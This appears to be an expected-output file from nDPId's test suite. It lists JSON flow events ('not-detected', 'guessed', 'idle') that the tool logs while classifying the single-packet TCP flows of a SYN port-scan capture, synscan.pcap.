-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":328,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":24444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":955,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059957,"flow_last_seen":1278275059957,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1000,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060065,"flow_last_seen":1278275060065,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3971,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059280,"flow_last_seen":1278275059280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6025,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059955,"flow_last_seen":1278275059955,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00645{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"RTMP","breed":"Acceptable","category":"Media"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1606,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1935,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
-00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1442,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1504,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":736,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1580,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060846,"flow_last_seen":1278275060846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3986,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":819,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059742,"flow_last_seen":1278275059742,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1723,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1956,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1147,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060335,"flow_last_seen":1278275060335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
